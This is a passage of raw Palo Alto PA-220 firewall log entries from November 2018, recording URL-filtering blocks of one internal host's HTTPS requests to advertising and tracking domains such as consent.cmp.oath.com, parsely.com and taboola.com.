16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,23.72.137.131,192.168.1.63,23.72.137.131,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,"b.scorecardresearch.com/",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:53 PA-220 1,2018/11/30 16:44:53,012801096514,THREAT,url,2049,2018/11/30 16:44:53,192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,"cdn.taboola.com/",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:54 PA-220 1,2018/11/30 16:44:54,012801096514,THREAT,url,2049,2018/11/30 16:44:54,192.168.15.224,54.192.7.152,192.168.1.63,54.192.7.152,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,"rules.quantcount.com/",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:14 PA-220 1,2018/11/30 16:45:13,012801096514,THREAT,url,2049,2018/11/30 16:45:13,192.168.15.224,216.58.194.98,192.168.1.63,216.58.194.98,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,"www.googleadservices.com/",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 